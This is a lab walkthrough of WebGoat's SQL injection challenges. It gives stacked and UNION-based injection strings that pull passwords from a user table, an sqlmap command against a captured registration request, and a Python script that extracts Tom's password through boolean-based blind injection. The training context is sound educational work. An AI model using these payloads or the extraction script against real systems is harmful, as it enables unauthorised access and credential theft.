Try It! Pulling data from other tables

Using what we learned from SQL Injection in the last section. Here we need to get all the data from another table using one of many ways to get Dave's password.

Is seems just using a SELECT statement will work:

'; SELECT * FROM user_system_data; --

That will give us the answer, but the Note says that there a multiple ways to solve this. Let's use the UNION statement.

Dave' UNION SELECT userid, user_name, password, cookie, null, null, null FROM user_system_data; --

If we look at the user_data table, we see that there are seven columns. That is why we need the three additional null's on the end of the query.

Now we can just enter the password into the form.

Page 5, Blind SQL Injection

Now, in this challenge we are just given a login form and asked to login as Tom. This is a culmination of everything that we have learned thus far.

Trying out the login page I didn't get anywhere...

There is a registration tab, let's click on that and see what we can get. Using Burp Suite, we can capture the PUT request as a txt document and run that through SQLMAP.

PUT /WebGoat/SqlInjectionAdvanced/challenge HTTP/1.1
Host: 192.168.100.14:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 89
Origin: http://192.168.100.14:8080
Connection: close
Referer: http://192.168.100.14:8080/WebGoat/start.mvc
Cookie: JSESSIONID=hWHYu4jEFuruvbJDIW2DNuYtys20mBVfF0nLdWEH

username_reg=Tom1&email_reg=aaa%40test.com&password_reg=qwerty&confirm_password_reg=qwerty

It looks like the parameter username_reg is vulnerable to boolean-based blind SQL Injection!

Now we need to find the name of the database tables before we can continue. Running SQLMAP with --dbs and --no-cast flags should return the database names

sqlmap -r Documents/WebGoat/register.txt -p username_reg -v 1 --dbs --no-cast

OK, to be honest, I got pretty lost at this point. I looked up other tutorials to find out what they did. Most of them continued to use SQLMAP to find the tables in the database. Whenever I tried to do this, SQLMAP just said no tables found. However, I did find a nifty Python script that finds the password for you.

import json
import requests

def sql_injection_advance_5():
alphabet_index = 0
alphabet = 'abcdefghijklmnopqrstuvwxyz'
password_index = 0
password = ''

headers = {
'Cookie': "JSESSIONID=Ey8-dfU_9_VdsFczC5-fYDEd5YxsOBSsXpG4pc7o",
}

while True:
payload = 'tom\' AND substring(password,{},1)=\'{}'.format(password_index + 1, alphabet[alphabet_index])

data = {
'username_reg': payload,
'email_reg': 'a@a',
'password_reg': 'a',
'confirm_password_reg': 'a'
}

r = requests.put('http://192.168.100.14:8080/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data)

try:
response = json.loads(r.text)
except:
print("Wrong JSESSIONID, find it by looking at your requests once logged in.")
return

if "already exists please try to register with a different username" not in response['feedback']:
alphabet_index += 1
if alphabet_index > len(alphabet) - 1:
return
else:
password += alphabet[alphabet_index]
print(password)
alphabet_index = 0
password_index += 1

sql_injection_advance_5()